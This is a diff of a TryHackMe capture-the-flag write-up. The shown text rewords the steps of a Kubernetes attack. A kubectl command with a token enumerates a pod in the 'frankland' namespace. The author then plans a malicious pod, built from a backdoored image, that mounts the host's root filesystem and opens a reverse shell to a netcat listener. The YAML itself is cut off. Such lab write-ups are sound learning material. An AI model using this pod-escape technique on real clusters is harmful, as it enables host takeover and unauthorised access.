F41zK4r1m/TryHackMe/Frank and herby try again.md

 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/a2985248-308d-4831-b962-1ee75cdc0580)

-By enumerating through the POD in the **frankland** namespace it looks like I have the privilege to create a new POD with the already available image.
-To leverage this I checked further details of the frankland in YAML format to get the image name.
+By exploring the POD in the **frankland** namespace, it seems that I have the privilege to create a new POD with an already available image.
+To leverage this, I checked further details of the "frankland" namespace in YAML format to obtain the image name:

 ```bash
 kubectl --server https://10.10.32.152:16443 --certificate-authority=ca.crt --token=$token get pod php-deploy-6d998f68b9-wlslz -n frankland -o yaml #list the POD details in yaml format.
 ```
 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/facfffde-166b-4cef-86ba-6aa3b1e02bcf)

-From this POD details I got the image names as : ```vulhub/php:8.1-backdoor```, using the image name I created a new malicious YAML file which will mount the '/' folder in '/mnt' directory & also connect back to the netcat listener.
-My final YAML file was something looking like this:
+From this POD details, I obtained the image name as **vulhub/php:8.1-backdoor**.
+Using the image name, I created a new malicious YAML file that would mount the '/' folder in '/mnt' directory and also connect back to the netcat listener.
+My final YAML file looked like this:

 ```yaml
 apiVersion: v1